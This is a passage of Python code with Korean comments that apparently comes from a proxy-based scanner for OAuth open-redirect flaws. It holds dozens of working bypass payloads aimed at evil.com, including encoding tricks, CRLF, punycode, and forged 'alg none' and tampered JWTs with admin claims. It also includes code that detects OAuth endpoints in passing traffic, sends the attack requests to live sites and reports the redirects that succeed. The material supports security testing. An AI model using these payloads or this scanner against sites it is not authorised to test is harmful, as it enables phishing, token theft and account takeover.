def _mutate_pattern22(self, original: str) -> str:
|
||
return f"https://evil.com%20@{original}"
|
||
|
||
# 23. %0c - 폼 피드 문자 우회
|
||
def _mutate_pattern23(self, original: str) -> str:
|
||
return f"https://evil.com%0c@{original}"
|
||
|
||
# 24. %0b - 수직 탭 문자 우회
|
||
def _mutate_pattern24(self, original: str) -> str:
|
||
return f"https://evil.com%0b@{original}"
|
||
|
||
# 25. %0a@ - 줄바꿈 문자 우회
|
||
def _mutate_pattern25(self, original: str) -> str:
|
||
return f"https://evil.com%0a@{original}"
|
||
|
||
# 26. %0d@ - 캐리지 리턴 우회 (URL parser confusion)
|
||
def _mutate_pattern26(self, original: str) -> str:
|
||
return f"https://evil.com%0d@{original}"
|
||
|
||
# 27. CRLF 인젝션 우회
|
||
def _mutate_pattern27(self, original: str) -> str:
|
||
# %0D%0A = CRLF (Carriage Return + Line Feed) - HTTP 헤더 인젝션
|
||
return f"https://evil.com%0D%0A@{original}"
|
||
|
||
# 28. HTTP/HTTPS 대소문자 혼합 스키마 우회
|
||
def _mutate_pattern28(self, original: str) -> str:
|
||
return f"HtTpS://evil.com@{original}"
|
||
|
||
# 29. 점(.) 문자 우회 - 스키마와 호스트 사이에 점 삽입 (표준 위반 = 취약점)
|
||
def _mutate_pattern29(self, original: str) -> str:
|
||
return f"https.://evil.com@{original}"
|
||
|
||
# 30. 포트 인코딩 우회 - %40 = @
|
||
def _mutate_pattern30(self, original: str) -> str:
|
||
return f"https://{original}:%40evil.com"
|
||
|
||
# 31. 앰퍼샌드 인코딩 우회 - URL 파싱 혼동
|
||
def _mutate_pattern31(self, original: str) -> str:
|
||
return f"https://{original} &%40evil.com"
|
||
|
||
# 32. 언더스코어 인코딩 우회 - 도메인 분리자로 오인
|
||
def _mutate_pattern32(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
path_part = parsed.path if parsed.path else ""
|
||
return f"https://{parsed.netloc}.%5F.evil.com{path_part}"
|
||
|
||
# 33. 콤마 분리자 우회 - 일부 파서에서 분리자로 인식
|
||
def _mutate_pattern33(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
path_part = parsed.path if parsed.path else ""
|
||
return f"https://{parsed.netloc}.%2C.evil.com{path_part}"
|
||
|
||
# 34. 스키마 없는 우회
|
||
def _mutate_pattern34(self, original: str) -> str:
|
||
return f"//evil.com/{original}"
|
||
|
||
# 35. 스키마 콜론 우회 - RFC 위반 파싱
|
||
def _mutate_pattern35(self, original: str) -> str:
|
||
return f"http:evil.com/{original}"
|
||
|
||
# 36. 널 바이트 prefix - 파싱 혼동
|
||
def _mutate_pattern36(self, original: str) -> str:
|
||
return f"%00https://evil.com/{original}"
|
||
|
||
# 37. 유니코드 공백 문자 - %E2%80%8B = zero-width space
|
||
def _mutate_pattern37(self, original: str) -> str:
|
||
return f"https://evil.com%E2%80%8B@{original}"
|
||
|
||
# 38. 대괄호 인코딩 우회
|
||
def _mutate_pattern38(self, original: str) -> str:
|
||
return f"https://{original}%5B%40evil.com"
|
||
|
||
# 39. 프로토콜 생략 + 백슬래시
|
||
def _mutate_pattern39(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
return f"\\\\evil.com\\{parsed.netloc}"
|
||
|
||
# 40. 쿼리 파라미터 내부 우회
|
||
def _mutate_pattern40(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
return f"https://{parsed.netloc}?url={parsed.netloc}&redirect=evil.com"
|
||
|
||
# 41. 앵커 태그 + @ 조합
|
||
def _mutate_pattern41(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
return f"https://{parsed.netloc}#evil.com@{parsed.netloc}"
|
||
|
||
# 42. 이모티콘 도메인
|
||
def _mutate_pattern42(self, original: str) -> str:
|
||
return f"https://😈.evil.com"
|
||
|
||
# 43. Punycode IDN 우회 (러시아어 evil.ru)
|
||
def _mutate_pattern43(self, original: str) -> str:
|
||
return f"https://xn--e1afmkfd.xn--p1ai" # evil в 러시아어
|
||
|
||
# 44. 백틱 + @ 조합
|
||
def _mutate_pattern44(self, original: str) -> str:
|
||
return f"https://evil.com`@{original}"
|
||
|
||
# 45. 복잡한 인코딩 혼합
|
||
def _mutate_pattern45(self, original: str) -> str:
|
||
return f"https://evil%2Ecom%09%0A%FF@{original}"
|
||
|
||
# 46. 물음표 + 백슬래시 조합
|
||
def _mutate_pattern46(self, original: str) -> str:
|
||
return f"https://{original}?\\evil.com"
|
||
|
||
# 47. JWT 'none' 알고리즘 우회
|
||
def _mutate_pattern47(self, original: str) -> str:
|
||
import base64
|
||
import json
|
||
|
||
# 'none' 알고리즘으로 서명 없는 JWT 생성
|
||
header = {"alg": "none", "typ": "JWT"}
|
||
payload = {
|
||
"redirect": "https://evil.com",
|
||
"iss": "evil.com",
|
||
"aud": "client_app",
|
||
"exp": 9999999999
|
||
}
|
||
|
||
header_b64 = base64.urlsafe_b64encode(
|
||
json.dumps(header, separators=(',', ':')).encode()
|
||
).decode().rstrip('=')
|
||
|
||
payload_b64 = base64.urlsafe_b64encode(
|
||
json.dumps(payload, separators=(',', ':')).encode()
|
||
).decode().rstrip('=')
|
||
|
||
# 서명 부분을 빈 문자열로 (none 알고리즘)
|
||
malicious_jwt = f"{header_b64}.{payload_b64}."
|
||
|
||
parsed = urlparse(original)
|
||
return f"https://{parsed.netloc}{parsed.path}?state={malicious_jwt}&redirect_uri=https://evil.com"
|
||
|
||
# 48. JWT 빈 서명 우회
|
||
def _mutate_pattern48(self, original: str) -> str:
|
||
import base64
|
||
import json
|
||
|
||
# 정상적인 헤더이지만 서명은 빈 값
|
||
header = {"alg": "HS256", "typ": "JWT"}
|
||
payload = {"redirect": "https://evil.com"}
|
||
|
||
header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=')
|
||
payload_b64 = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip('=')
|
||
|
||
# 서명 부분만 비우기
|
||
malicious_jwt = f"{header_b64}.{payload_b64}."
|
||
|
||
parsed = urlparse(original)
|
||
return f"https://{parsed.netloc}{parsed.path}?state={malicious_jwt}&redirect_uri=https://evil.com"
|
||
|
||
# 49. State 파라미터 오염 공격
|
||
def _mutate_pattern49(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
query = parse_qs(parsed.query)
|
||
|
||
# 원본 쿼리 파라미터 유지하면서 state 여러 개 추가
|
||
evil_params = []
|
||
for key, values in query.items():
|
||
for value in values:
|
||
evil_params.append(f"{key}={value}")
|
||
|
||
# 여러 state 파라미터 추가 (파서 혼동 유발)
|
||
evil_params.extend([
|
||
"state=legitimate_state",
|
||
"state=https://evil.com",
|
||
"State=https://evil.com", # 대문자
|
||
"STATE=https://evil.com", # 모두 대문자
|
||
"redirect_uri=https://evil.com"
|
||
])
|
||
|
||
evil_query = "&".join(evil_params)
|
||
return f"https://{parsed.netloc}{parsed.path}?{evil_query}"
|
||
|
||
def _mutate_pattern50(self, original: str) -> str:
|
||
"""50. State 파라미터 대소문자 변형"""
|
||
parsed = urlparse(original)
|
||
base_url = f"https://{parsed.netloc}{parsed.path}"
|
||
|
||
# 대소문자 조합으로 파서 혼동
|
||
return f"{base_url}?state=normal&State=https://evil.com&STATE=backup&redirect_uri=https://evil.com"
|
||
|
||
# 51. JWT 헤더 조작 우회
|
||
def _mutate_pattern51(self, original: str) -> str:
|
||
import base64
|
||
import json
|
||
|
||
# 헤더에 이상한 값들 넣어보기
|
||
malicious_headers = [
|
||
{"alg": "none", "typ": "JWT", "kid": "../../../evil.com"},
|
||
{"alg": "HS256", "typ": "JWS"}, # typ 변경
|
||
{"alg": "RS256", "typ": "JWT", "x5u": "https://evil.com/cert"}, # 외부 인증서
|
||
]
|
||
|
||
results = []
|
||
for header in malicious_headers:
|
||
payload = {"redirect": "https://evil.com"}
|
||
|
||
header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=')
|
||
payload_b64 = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip('=')
|
||
|
||
jwt_token = f"{header_b64}.{payload_b64}.fake_signature"
|
||
results.append(jwt_token)
|
||
|
||
# 첫 번째 조작된 JWT 사용
|
||
parsed = urlparse(original)
|
||
return f"https://{parsed.netloc}{parsed.path}?state={results[0]}&redirect_uri=https://evil.com"
|
||
|
||
# 52. JWT 페이로드 오염 공격
|
||
def _mutate_pattern52(self, original: str) -> str:
|
||
import base64
|
||
import json
|
||
|
||
# 페이로드에 다양한 클레임 주입
|
||
malicious_payload = {
|
||
"iss": "https://evil.com", # 발급자 변조
|
||
"aud": "evil_client", # 대상 변조
|
||
"redirect": "https://evil.com", # 직접적인 리다이렉트
|
||
"redirect_uri": "https://evil.com", # OAuth 파라미터
|
||
"url": "https://evil.com", # 일반적인 URL 파라미터
|
||
"callback": "https://evil.com", # 콜백 URL
|
||
"return_to": "https://evil.com", # 리턴 URL
|
||
"admin": True, # 권한 상승 시도
|
||
"role": "admin" # 역할 변조
|
||
}
|
||
|
||
header = {"alg": "HS256", "typ": "JWT"}
|
||
|
||
header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=')
|
||
payload_b64 = base64.urlsafe_b64encode(json.dumps(malicious_payload).encode()).decode().rstrip('=')
|
||
|
||
jwt_token = f"{header_b64}.{payload_b64}.evil_signature"
|
||
|
||
parsed = urlparse(original)
|
||
return f"https://{parsed.netloc}{parsed.path}?state={jwt_token}&redirect_uri=https://evil.com"
|
||
|
||
'''aiohttp 세션 생성 (재사용)'''
|
||
async def _get_session(self):
|
||
if self.session is None:
|
||
timeout = aiohttp.ClientTimeout(total=10)
|
||
self.session = aiohttp.ClientSession(timeout=timeout)
|
||
return self.session
|
||
|
||
'''세션 정리'''
|
||
async def close_session(self):
|
||
if self.session:
|
||
await self.session.close()
|
||
self.session = None
|
||
|
||
""" 우회된 URL에 GET 요청을 보내고, 서버 응답 정보 반환 """
|
||
async def _send_request(self, url, headers=None):
|
||
try:
|
||
session = await self._get_session() # 세션 준비
|
||
request_headers = headers or {} # 요청 헤더 설정 - headers가 주어지지 않았다면 빈 딕셔너리 사용
|
||
|
||
# 서버에 GET 요청 전송 (allow_redirects=False로 리다이렉트 추적)
|
||
async with session.get(url, allow_redirects=False, headers=request_headers) as response:
|
||
result = {
|
||
'status': response.status,
|
||
'location': response.headers.get("Location", ""),
|
||
'headers': dict(response.headers)
|
||
}
|
||
|
||
# 성공/실패 기록 (rate limiter용)
|
||
if response.status in [200, 301, 302, 303, 307, 308]:
|
||
redirect_limiter.record_success()
|
||
else:
|
||
redirect_limiter.record_failure(f"HTTP {response.status}")
|
||
|
||
return result
|
||
|
||
except Exception as e:
|
||
redirect_limiter.record_failure(str(e))
|
||
print(f"[ERROR] 요청 실패 ({url}): {e}")
|
||
return {'status': 500, 'location': '', 'headers': {}}
|
||
|
||
def _is_client_redirect_request(self, url, parsed, query):
|
||
"""OAuth 콜백 감지 - OAuth 로그인 완료 후 돌아온 페이지인가 확인"""
|
||
|
||
# 0. OAuth 제공자 제외
|
||
oauth_provider_domains = [
|
||
# Google
|
||
"accounts.google.com", "oauth2.googleapis.com",
|
||
# Facebook/Meta
|
||
"www.facebook.com", "facebook.com", "graph.facebook.com",
|
||
# Microsoft
|
||
"login.live.com", "login.microsoftonline.com", "account.live.com",
|
||
"login.windows.net", "login.microsoft.com",
|
||
# GitHub
|
||
"github.com", "api.github.com",
|
||
# Apple
|
||
"appleid.apple.com", "accounts.apple.com",
|
||
# Others
|
||
"login.yahoo.com", "accounts.twitter.com", "api.twitter.com",
|
||
"linkedin.com", "www.linkedin.com",
|
||
"kauth.kakao.com", "accounts.kakao.com",
|
||
# 추가 제외할 제공자들
|
||
"auth0.com", "okta.com", "onelogin.com"
|
||
]
|
||
|
||
if any(provider in parsed.netloc for provider in oauth_provider_domains):
|
||
return False
|
||
|
||
# 1. URL 경로로 OAuth 콜백인지 확인 - 기존 OAuth 콜백 패턴
|
||
oauth_callback_patterns = [
|
||
'/oauth/callback', '/auth/callback', '/login/callback',
|
||
'/oauth/redirect', '/auth/return', '/sso/callback',
|
||
'/signup', '/register',
|
||
]
|
||
|
||
path = parsed.path.lower()
|
||
is_oauth_callback = any(pattern in path for pattern in oauth_callback_patterns)
|
||
|
||
# 2. OAuth 응답 파라미터 확인 - URL에 아래 정보 있는지 확인
|
||
oauth_response_params = [
|
||
'code', 'access_token', 'id_token', 'state', 'error',
|
||
'from' # from=fb, from=google 등
|
||
]
|
||
|
||
has_oauth_response = any(param in query for param in oauth_response_params)
|
||
|
||
# 3. 소셜 로그인 패턴 감지 - 어디서 로그인했는지 확인
|
||
def has_social_login_pattern(query_string):
|
||
import re
|
||
|
||
# 패턴 1: 간단한 소셜 식별자
|
||
simple_patterns = ['from=fb', 'from=facebook', 'from=google', 'from=github']
|
||
has_simple = any(pattern in query_string.lower() for pattern in simple_patterns)
|
||
|
||
# 패턴 2: URL 형태
|
||
url_pattern = r'from=https?%3A%2F%2F' # from=https:// (URL 인코딩됨)
|
||
has_url = bool(re.search(url_pattern, query_string))
|
||
|
||
return has_simple or has_url
|
||
|
||
query_string = parsed.query
|
||
has_social_login = has_social_login_pattern(query_string)
|
||
|
||
# 4. 리다이렉트 파라미터(우리가 공격할 타겟) 확인
|
||
client_redirect_params = [
|
||
'next', 'return_to', 'continue', 'redirect_uri', 'redirect_url',
|
||
'destination', 'success_url', 'callback_url', 'goto', 'forward_to',
|
||
'redirectUrl', 'redirectURL', 'redirect_to', 'returnUrl', 'returnURL',
|
||
'from', 'target', 'targetUrl', 'targetURL' # 일반적인 변형들 추가
|
||
]
|
||
|
||
has_redirect_param = any(param in query for param in client_redirect_params)
|
||
|
||
# 5. OAuth 혼합 패턴 감지 (요청+응답 파라미터 동시 존재)
|
||
oauth_request_params = ['client_id', 'response_type']
|
||
oauth_redirect_params = ['return_to', 'redirect_uri']
|
||
has_oauth_request = any(param in query for param in oauth_request_params)
|
||
has_oauth_redirect = any(param in query for param in oauth_redirect_params)
|
||
|
||
# 최종 판단 기준 1 - (콜백 경로 + OAuth 파라미터) 또는 소셜 로그인 있고, 리다이렉트 파라미터 또는 state 있으면 → OAuth 콜백!
|
||
if (is_oauth_callback and has_oauth_response) or has_social_login:
|
||
if has_redirect_param or 'state' in query:
|
||
print(f"[CLIENT_OAUTH] 📱 OAuth 콜백 감지: {parsed.netloc}")
|
||
return True
|
||
|
||
# 최종 판단 기준 2 - OAuth 요청 파라미터와 리다이렉트 파라미터가 둘 다 있으면 → OAuth 혼합 패턴!
|
||
if has_oauth_request and has_oauth_redirect:
|
||
print(f"[CLIENT_OAUTH] 📱 OAuth 혼합 패턴 감지: {parsed.netloc}")
|
||
return True
|
||
|
||
return False
|
||
|
||
def _is_self_oauth_request(self, url, parsed, query):
|
||
"""자체 OAuth - authorize 엔드포인트 요청인지 확인 (로그인 불필요)"""
|
||
|
||
# 0. OAuth 제공자 도메인 제외
|
||
oauth_provider_domains = [
|
||
"accounts.google.com", "oauth2.googleapis.com",
|
||
"www.facebook.com", "facebook.com", "graph.facebook.com",
|
||
"github.com", "api.github.com",
|
||
"login.microsoftonline.com", "login.live.com",
|
||
"account.live.com", "login.windows.net", "login.microsoft.com",
|
||
"appleid.apple.com", "accounts.apple.com",
|
||
"login.yahoo.com", "accounts.twitter.com","api.twitter.com",
|
||
"linkedin.com", "www.linkedin.com",
|
||
"okta.com",
|
||
"auth0.com", "onelogin.com",
|
||
]
|
||
|
||
if any(provider in parsed.netloc for provider in oauth_provider_domains):
|
||
return False
|
||
|
||
# 1. 자체 OAuth 엔드포인트 패턴 확인
|
||
oauth_endpoints = [
|
||
'/oauth/authorize', '/oauth/auth', '/auth/oauth',
|
||
'/sso/authorize', '/api/oauth/authorize',
|
||
'/v1/oauth/authorize', '/oauth2/authorize',
|
||
'/oauth2/v1/authorize',
|
||
'/authorize', # 일반적인 authorize 추가
|
||
'/auth/realms', # Keycloak 패턴
|
||
'/connect/authorize' # IdentityServer 패턴
|
||
]
|
||
|
||
path = parsed.path.lower()
|
||
is_oauth_path = any(endpoint in path for endpoint in oauth_endpoints)
|
||
|
||
# 2. OAuth 요청 파라미터 확인 - OAuth 로그인에 필요한 정보들이 있는지 확인
|
||
oauth_request_params = ['client_id', 'redirect_uri', 'response_type', 'scope']
|
||
has_oauth_params = any(param in query for param in oauth_request_params)
|
||
|
||
# 3. 표준 OAuth 파라미터 조합 확인 - OAuth의 핵심 3요소가 모두 있는지 확인
|
||
has_standard_oauth = (
|
||
'client_id' in query and
|
||
'redirect_uri' in query and
|
||
'response_type' in query
|
||
)
|
||
|
||
# 최종 판단 기준 - 조건 1: (OAuth 경로 + OAuth 파라미터) 있거나 조건 2: 표준 OAuth 3요소 모두 있으면 → 자체 OAuth 시스템!
|
||
if (is_oauth_path and has_oauth_params) or has_standard_oauth:
|
||
print(f"[SELF_OAUTH] 🏠 자체 OAuth 제공자 감지: {parsed.netloc}")
|
||
return True
|
||
|
||
return False
|
||
|
||
async def test(self, flow: http.HTTPFlow):
|
||
"""테스트 시작점 - url 받아와서 oauth 콜백/자체 oauth인지 체크"""
|
||
url = flow.request.pretty_url
|
||
parsed = urlparse(url)
|
||
query = parse_qs(parsed.query)
|
||
|
||
if flow.request.method != "GET":
|
||
return
|
||
|
||
# OAuth 관련 요청인지 확인
|
||
if (self._is_client_redirect_request(url, parsed, query) or
|
||
self._is_self_oauth_request(url, parsed, query)):
|
||
await self._test_oauth_redirect(url, parsed, query)
|
||
return
|
||
|
||
async def _test_oauth_redirect(self, url, parsed, query):
|
||
"""OAuth 리다이렉트 취약점 테스트"""
|
||
|
||
# 중복 테스트 방지
|
||
endpoint_key = f"OAUTH:{parsed.netloc}{parsed.path}"
|
||
|
||
if endpoint_key in self.tested_endpoints:
|
||
return # 이미 테스트했으므로 패스
|
||
if endpoint_key in self.testing_targets:
|
||
return # 현재 테스트 중이므로 패스
|
||
|
||
self.testing_targets.add(endpoint_key)
|
||
|
||
try:
|
||
print(f"[START] 🔍 테스트 시작: {parsed.netloc}{parsed.path}")
|
||
print(f"[TARGET] 타겟: {parsed.netloc}")
|
||
|
||
# 1. state 파라미터 확인 후 조작
|
||
if 'state' in query:
|
||
await self._test_state_parameter_manipulation(url, parsed, query)
|
||
|
||
# 2. 테스트할 파라미터들 찾기
|
||
test_params = []
|
||
|
||
# redirect_uri (자체 OAuth에서 주로 사용)
|
||
if 'redirect_uri' in query:
|
||
test_params.append(('redirect_uri', query['redirect_uri'][0]))
|
||
|
||
# 클라이언트 리다이렉트 파라미터들
|
||
client_redirect_params = [
|
||
'next', 'return_to', 'continue', 'redirect_url',
|
||
'destination', 'success_url', 'callback_url', 'goto', 'forward_to',
|
||
'redirectUrl', 'from', 'target'
|
||
]
|
||
|
||
for param in client_redirect_params:
|
||
if param in query:
|
||
test_params.append((param, query[param][0]))
|
||
|
||
# 테스트할 파라미터가 없으면 종료
|
||
if not test_params:
|
||
print(f"[OAUTH] 리다이렉트 파라미터 없음 - 테스트 ❌")
|
||
return
|
||
|
||
print(f"[OAUTH] 📍 발견된 파라미터들: {test_params}")
|
||
print(f"[OPEN_REDIRECT] 총 우회 패턴: {len(self.bypass_payloads)}")
|
||
print("-" * 50)
|
||
|
||
redirect_limiter.reset_for_new_target()
|
||
success_count = 0
|
||
|
||
# 3. 각 파라미터별로 모든 우회 패턴 테스트
|
||
for param_name, original_value in test_params:
|
||
print(f"\n[OAUTH] 🎯 {param_name} 파라미터 테스트 시작")
|
||
|
||
for i, payload in enumerate(self.bypass_payloads, 1):
|
||
print(f"[{i:2d}/{len(self.bypass_payloads)}] {payload.name}", end=" ... ")
|
||
|
||
result = await self._test_bypass_pattern(
|
||
url, query, parsed, original_value, payload, param_name
|
||
)
|
||
|
||
if result:
|
||
success_count += 1
|
||
print("🚨 VULNERABLE!")
|
||
else:
|
||
print("✓")
|
||
|
||
# 조기 종료 체크 (연속 실패)
|
||
can_proceed = await redirect_limiter.wait_if_needed(payload.name)
|
||
if not can_proceed:
|
||
print(f"\n[TARGET_ABANDON] 🚫 타겟 포기로 인한 테스트 조기 종료")
|
||
break
|
||
|
||
# 한 파라미터에서 포기했으면 다른 파라미터도 건너뛰기
|
||
if redirect_limiter.should_abandon_target:
|
||
break
|
||
|
||
print("-" * 50)
|
||
print(f"[OAUTH] ✅ OAuth 테스트 완료: {success_count}개 취약점")
|
||
|
||
except Exception as e:
|
||
print(f"[ERROR] OAuth 테스트 실패: {e}")
|
||
finally:
|
||
self.testing_targets.discard(endpoint_key)
|
||
self.tested_endpoints.add(endpoint_key)
|
||
await self.close_session()
|
||
|
||
async def _test_state_parameter_manipulation(self, url, parsed, query):
|
||
"""State 파라미터 조작 테스트"""
|
||
print(f"[STATE_TEST] 🔍 State 파라미터 조작 테스트")
|
||
|
||
# 원본 state 확인
|
||
original_state = query['state'][0]
|
||
print(f"[STATE_TEST] 원본 state: {original_state[:50]}...")
|
||
|
||
# State 공격 패턴들
|
||
state_attacks = {
|
||
"state_direct_url": "https://evil.com",
|
||
"state_protocol_relative": "//evil.com",
|
||
"state_json_redirect": '{"redirect": "https://evil.com"}',
|
||
"state_json_return_to": '{"return_to": "https://evil.com"}',
|
||
"state_json_callback": '{"callback": "https://evil.com"}',
|
||
"state_query_redirect": "redirect=https://evil.com",
|
||
"state_query_return_to": "return_to=https://evil.com",
|
||
"state_base64_json": "eyJyZWRpcmVjdCI6ICJodHRwczovL2V2aWwuY29tIn0=",
|
||
"state_jwt_attack": "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJyZWRpcmVjdCI6Imh0dHBzOi8vZXZpbC5jb20ifQ.",
|
||
"state_original_append": f"{original_state}&redirect=https://evil.com",
|
||
"state_original_pipe": f"{original_state}|https://evil.com",
|
||
"state_url_encoded": "https%3A//evil.com"
|
||
}
|
||
|
||
success_count = 0
|
||
|
||
for i, (attack_name, malicious_state) in enumerate(state_attacks.items(), 1):
|
||
print(f"[STATE_TEST] [{i:2d}/{len(state_attacks)}] {attack_name}")
|
||
|
||
# 원본 쿼리 복사하고 state만 변경
|
||
modified_query = query.copy()
|
||
modified_query['state'] = [malicious_state]
|
||
|
||
# 새 URL 생성
|
||
new_query_string = urlencode(modified_query, doseq=True)
|
||
test_url = urlunparse(parsed._replace(query=new_query_string))
|
||
|
||
# 요청 전송
|
||
response = await self._send_request(test_url)
|
||
|
||
# State 전용 취약점 분석
|
||
if await self._analyze_state_vulnerability(url, test_url, malicious_state, response, attack_name):
|
||
success_count += 1
|
||
print(f"[STATE_TEST] ✅ 취약점 발견! {attack_name}")
|
||
else:
|
||
print(f"[STATE_TEST] ✓ {attack_name}")
|
||
|
||
# 레이트 리미팅
|
||
await redirect_limiter.wait_if_needed(f"state_{attack_name}")
|
||
|
||
print(f"[STATE_TEST] ✅ State 테스트 완료: {success_count}/{len(state_attacks)} 취약점 발견")
|
||
|
||
async def _analyze_state_vulnerability(self, original_url, test_url, malicious_state, response, attack_name):
|
||
"""State 파라미터 취약점 전용 분석"""
|
||
status = response['status']
|
||
location = response['location']
|
||
|
||
# 리다이렉트 응답인지 확인
|
||
if status not in [301, 302, 303, 307, 308]:
|
||
return False
|
||
|
||
if not location:
|
||
return False
|
||
|
||
# 악성 도메인으로 리다이렉트되었는지 확인
|
||
if self._is_redirected_to_malicious_domain(location):
|
||
|
||
print(f"[🎯 VULNERABILITY CONFIRMED] OAuth State 조작 취약점 발견!")
|
||
|
||
await self._report_state_vulnerability(
|
||
original_url, test_url, malicious_state,
|
||
location, attack_name
|
||
)
|
||
return True
|
||
|
||
return False
|
||
|
||
async def _report_state_vulnerability(self, original_url, test_url, malicious_state, location, attack_name):
|
||
"""State 파라미터 취약점 전용 리포트"""
|
||
|
||
description = (
|
||
f"OAuth State Parameter Manipulation 취약점 발견!\n\n"
|
||
f"• 공격 방법: {attack_name}\n"
|
||
f"• 원본 URL: {original_url}\n"
|
||
f"• 조작된 state 값: {malicious_state}\n"
|
||
f"• 테스트 URL: {test_url}\n"
|
||
f"• 실제 리다이렉트 위치: {location}\n\n"
|
||
f"🚨 State 파라미터 조작을 통한 피싱 공격이 가능합니다!\n"
|
||
)
|
||
|
||
report_vuln(
|
||
title="OAuth State Parameter Manipulation Vulnerability",
|
||
desc=description,
|
||
status="HIGH",
|
||
uri=test_url
|
||
)
|
||
|
||
print(f"🎯 OAuth State 조작 취약점 발견 및 보고 완료!")
|
||
|
||
""" 우회 URL 생성 및 요청 전송 """
|
||
async def _test_bypass_pattern(self, original_url, query, parsed_url, original_redirect_value, payload, redirect_param):
|
||
|
||
# 레이트 리미팅 체크
|
||
can_proceed = await redirect_limiter.wait_if_needed(payload.name)
|
||
if not can_proceed:
|
||
print(f"[TARGET_ABANDON] ⏹️ 패턴 테스트 중단: {payload.name}")
|
||
return False
|
||
|
||
try:
|
||
# 1. 테스트 시작
|
||
print(f"[PATTERN] 🚀 {payload.name} 테스트 시작")
|
||
|
||
# 2. 우회 URL 생성
|
||
if original_redirect_value.startswith('http'):
|
||
# 이미 완전한 URL인 경우
|
||
bypassed_redirect = payload.mutate(original_redirect_value)
|
||
else:
|
||
# 상대 경로인 경우 완전한 URL로 만들어서 우회
|
||
full_original = f"https://{original_redirect_value}"
|
||
bypassed_redirect = payload.mutate(full_original)
|
||
|
||
# 3. 파라미터 보존 전략 - 원본 url의 다른 파라미터들은 그대로 두고 redirect 파라미터만 악성으로 바꿈
|
||
modified_query = query.copy()
|
||
modified_query[redirect_param] = [bypassed_redirect]
|
||
|
||
new_query_string = urlencode(modified_query, doseq=True)
|
||
test_url = urlunparse(parsed_url._replace(query=new_query_string))
|
||
|
||
# 4. 요청 전송
|
||
response = await self._send_request(test_url)
|
||
|
||
# 5. 응답 분석
|
||
result = await self._analyze_response(original_url, test_url, bypassed_redirect, response, payload)
|
||
|
||
if result:
|
||
print(f"[PATTERN] ✅ {payload.name} → SUCCESS")
|
||
else:
|
||
print(f"[PATTERN] ✅ {payload.name} → SAFE")
|
||
|
||
return result
|
||
|
||
except Exception as e:
|
||
print(f"[PATTERN] ❌ {payload.name} → ERROR: {e}")
|
||
return False
|
||
|
||
""" 응답 분석 """
|
||
async def _analyze_response(self, original_url, test_url, bypassed_redirect, response, payload):
|
||
status = response['status']
|
||
location = response['location']
|
||
|
||
# 리다이렉트 응답인지 확인
|
||
if status not in [301, 302, 303, 307, 308]:
|
||
return False
|
||
|
||
if not location:
|
||
return False
|
||
|
||
# 악성 도메인으로 리다이렉트되었는지 확인
|
||
if self._is_redirected_to_malicious_domain(location):
|
||
|
||
print(f"[🎯 VULNERABILITY CONFIRMED] Open Redirect 취약점 발견!")
|
||
|
||
await self._report_open_redirect_vulnerability(
|
||
original_url, test_url, bypassed_redirect,
|
||
location, payload
|
||
)
|
||
return True
|
||
|
||
return False
|
||
|
||
def _is_redirected_to_malicious_domain(self, location: str) -> bool:
|
||
"""실제로 악성 도메인으로 리다이렉트되었는지 확인"""
|
||
|
||
try:
|
||
location_parsed = urlparse(location)
|
||
location_host = location_parsed.hostname
|
||
|
||
# 실제 호스트만 확인 (URL 파라미터는 무시)
|
||
if not location_host:
|
||
return False
|
||
|
||
# 메이저 OAuth 제공자 도메인이면 취약점 아님
|
||
safe_domains = [
|
||
# Google (구글)
|
||
"accounts.google.com", "google.com", "www.google.com",
|
||
"oauth2.googleapis.com", "accounts.youtube.com",
|
||
|
||
# Facebook/Meta (페이스북)
|
||
"www.facebook.com", "facebook.com", "m.facebook.com",
|
||
"graph.facebook.com", "developers.facebook.com",
|
||
|
||
# GitHub (깃헙) ← 추가!
|
||
"github.com", "www.github.com", "api.github.com",
|
||
|
||
# Microsoft (마이크로소프트) ← 추가!
|
||
"login.microsoftonline.com", "login.live.com",
|
||
"account.live.com", "login.windows.net", "login.microsoft.com",
|
||
"outlook.live.com", "account.microsoft.com",
|
||
]
|
||
if any(safe_domain in location_host.lower() for safe_domain in safe_domains):
|
||
return False
|
||
|
||
# 실제 악성 도메인들
|
||
malicious_domains = ["evil.com", "attacker.com", "malicious.site"]
|
||
if any(domain in location_host.lower() for domain in malicious_domains):
|
||
print(f"[MALICIOUS_REDIRECT] 🚨 악성 도메인으로 리다이렉트 감지: {location_host}")
|
||
return True
|
||
|
||
return False
|
||
|
||
except Exception as e:
|
||
return False
|
||
|
||
""" 취약점 보고서 생성 """
|
||
async def _report_open_redirect_vulnerability(self, original_url, test_url, bypassed_redirect, location, payload):
|
||
"""Open Redirect 취약점 보고서 생성"""
|
||
pattern_name = getattr(payload, 'name', 'unknown')
|
||
pattern_description = getattr(payload, 'description', 'Unknown bypass pattern')
|
||
|
||
description = (
|
||
f"Open Redirect 취약점 발견!\n\n"
|
||
f"• 우회 패턴: {pattern_name}\n"
|
||
f"• 설명: {pattern_description}\n"
|
||
f"• 원본 URL: {original_url}\n"
|
||
f"• 우회된 redirect 값: {bypassed_redirect}\n"
|
||
f"• 테스트 URL: {test_url}\n"
|
||
f"• 실제 리다이렉트 위치: {location}\n\n"
|
||
f"🚨 이 취약점을 이용하면 피싱 공격이 가능합니다!\n"
|
||
)
|
||
|
||
report_vuln(
|
||
title="OAuth Open Redirect Vulnerability",
|
||
desc=description,
|
||
status="MEDIUM",
|
||
uri=test_url
|
||
)
|
||
print(f"🎯 OAuth Open Redirect 취약점 발견 및 보고 완료!")
|
||
|
||
def reset_session(self):
|
||
"""새 세션 시작 (새 타겟 사이트 테스트 시)"""
|
||
if len(self.tested_endpoints) > 1000:
|
||
old_entries = list(self.tested_endpoints)[:500]
|
||
for entry in old_entries:
|
||
self.tested_endpoints.discard(entry)
|
||
|
||
self.testing_targets.clear()
|
||
|
||
async def cleanup(self):
|
||
"""정리 작업"""
|
||
await self.close_session()
|